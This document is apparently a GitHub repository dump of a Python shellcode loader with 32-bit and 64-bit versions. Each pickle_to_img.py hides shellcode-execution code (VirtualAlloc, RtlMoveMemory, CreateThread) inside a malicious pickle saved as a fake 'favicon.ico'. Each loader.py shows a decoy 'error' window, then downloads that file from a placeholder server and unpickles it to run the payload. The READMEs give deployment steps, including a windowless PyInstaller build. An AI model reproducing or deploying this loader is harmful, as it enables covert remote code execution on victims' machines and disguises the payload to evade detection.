├── x32
    ├── README.md
    ├── loader.py
    └── pickle_to_img.py
└── x64
    ├── README.md
    ├── loader.py
    └── pickle_to_img.py


/x32/README.md:
--------------------------------------------------------------------------------
 1 | # Base64 your shellcode and put
 2 | https://github.com/iloveflag/PythonShellcodeLoader/blob/main/x32/pickle_to_img.py#L18
 3 | # Run pickle_to_img.py
 4 | # Put "favicon.ico" to your webserver
 5 | # Editor request url
 6 | https://github.com/iloveflag/PythonShellcodeLoader/blob/main/x32/loader.py#L35
 7 | # Pyinstaller -F loader.py -w 
 8 | # NOTICE
 9 | must be win32 python
10 | 
11 | myenv:win10+Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:21:23) [MSC v.1916 32 bit (Intel)] on win32


--------------------------------------------------------------------------------
/x64/README.md:
--------------------------------------------------------------------------------
 1 | # Base64 your shellcode and put
 2 | https://github.com/iloveflag/PythonShellcodeLoader/blob/main/x64/pickle_to_img.py#L6
 3 | # Run pickle_to_img.py
 4 | # Put "favicon.ico" to your webserver
 5 | # Editor request url
 6 | https://github.com/iloveflag/PythonShellcodeLoader/blob/main/x64/loader.py#L24
 7 | # Pyinstaller -F loader.py -w 
 8 | # NOTICE
 9 | myenv:win10+Python 3.9.12 (main, Apr  4 2022, 05:22:27) [MSC v.1916 64 bit (AMD64)] :: Anaconda, Inc. on win32
10 | x64 mybe not support in win7


--------------------------------------------------------------------------------
/x64/loader.py:
--------------------------------------------------------------------------------
 1 | import urllib.request
 2 | from tkinter import *
 3 | 
 4 | 
 5 | class Application(Frame):
 6 |     def __init__(self, master=None):
 7 |         Frame.__init__(self, master)
 8 |         self.pack()
 9 |         self.createWidgets()
10 | 
11 |     def createWidgets(self):
12 |         self.helloLabel = Label(self, text='error')
13 |         self.helloLabel.pack()
14 | 
15 | 
16 | app = Application()
17 | 
18 | app.master.title('https://github.com/iloveflag/PythonShellcodeLoader')
19 | app.mainloop()
20 | 
21 | import pickle
22 | import ctypes
23 | 
24 | shellcode = urllib.request.urlopen("http://yourserver/favicon.ico").read()
25 | pickle.loads(shellcode)
26 | 


--------------------------------------------------------------------------------
/x32/loader.py:
--------------------------------------------------------------------------------
 1 | # !/usr/bin/env python
 2 | # -*-coding:utf-8 -*-
 3 | 
 4 | """
 5 | # File: loader.py
 6 | # Time：2022/5/27 22:43
 7 | # Author：iloveflag@outlook.com
 8 | # version：Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:21:23) [MSC v.1916 32 bit (Intel)] on win32
 9 | # Github：https://github.com/iloveflag
10 | """
11 | 
12 | import urllib.request
13 | from tkinter import *
14 | 
15 | 
16 | class Application(Frame):
17 |     def __init__(self, master=None):
18 |         Frame.__init__(self, master)
19 |         self.pack()
20 |         self.createWidgets()
21 | 
22 |     def createWidgets(self):
23 |         self.helloLabel = Label(self, text='error')
24 |         self.helloLabel.pack()
25 | 
26 | 
27 | app = Application()
28 | 
29 | app.master.title('https://github.com/iloveflag/PythonShellcodeLoader')
30 | app.mainloop()
31 | 
32 | import pickle
33 | import ctypes
34 | 
35 | shellcode = urllib.request.urlopen("http://yourserver/favicon.ico").read()
36 | pickle.loads(shellcode)
37 | 


--------------------------------------------------------------------------------
/x64/pickle_to_img.py:
--------------------------------------------------------------------------------
 1 | import pickle
 2 | shellcode = """
 3 | import base64
 4 | import ctypes
 5 | import codecs
 6 | shellcode= "***base64 your shellcode and put!***"
 7 | shellcode = base64.b64decode(shellcode)
 8 | shellcode = codecs.escape_decode(shellcode)[0]
 9 | shellcode = bytearray(shellcode)
10 | ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
11 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
12 | buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
13 | ctypes.windll.kernel32.RtlMoveMemory(
14 |  ctypes.c_uint64(ptr), 
15 |  buf, 
16 |  ctypes.c_int(len(shellcode))
17 | )
18 | handle = ctypes.windll.kernel32.CreateThread(
19 |  ctypes.c_int(0), 
20 |  ctypes.c_int(0), 
21 |  ctypes.c_uint64(ptr), 
22 |  ctypes.c_int(0), 
23 |  ctypes.c_int(0), 
24 |  ctypes.pointer(ctypes.c_int(0))
25 | )
26 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
27 | """
28 | 
29 | 
30 | class A(object):
31 |     def __reduce__(self):
32 |         return (exec, (shellcode,))
33 | 
34 | 
35 | ret = pickle.dumps(A())
36 | with open("favicon.ico", 'wb') as img:
37 |     img.write(ret)
38 | 


--------------------------------------------------------------------------------
/x32/pickle_to_img.py:
--------------------------------------------------------------------------------
 1 | # !/usr/bin/env python
 2 | # -*-coding:utf-8 -*-
 3 | 
 4 | """
 5 | # File: pickle_to_img.py
 6 | # Time：2022/5/27 22:45
 7 | # Author：iloveflag@outlook.com
 8 | # version：Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:21:23) [MSC v.1916 32 bit (Intel)] on win32
 9 | # Github：https://github.com/iloveflag
10 | """
11 | 
12 | import pickle
13 | 
14 | shellcode = """
15 | import base64
16 | import ctypes
17 | import codecs
18 | shellcode= "***base64 your shellcode and put!***"
19 | shellcode = base64.b64decode(shellcode)
20 | shellcode = codecs.escape_decode(shellcode)[0]
21 | shellcode = bytearray(shellcode)
22 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
23 |                                           ctypes.c_int(len(shellcode)),
24 |                                           ctypes.c_int(0x3000),
25 |                                           ctypes.c_int(0x40))
26 | 
27 | buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
28 | 
29 | ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
30 |                                      buf,
31 |                                      ctypes.c_int(len(shellcode)))
32 | 
33 | ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
34 |                                          ctypes.c_int(0),
35 |                                          ctypes.c_int(ptr),
36 |                                          ctypes.c_int(0),
37 |                                          ctypes.c_int(0),
38 |                                          ctypes.pointer(ctypes.c_int(0)))
39 | 
40 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
41 | """
42 | 
43 | 
44 | class A(object):
45 |     def __reduce__(self):
46 |         return (exec, (shellcode,))
47 | 
48 | 
49 | ret = pickle.dumps(A())
50 | with open("favicon.ico", 'wb') as img:
51 |     img.write(ret)
52 | 


--------------------------------------------------------------------------------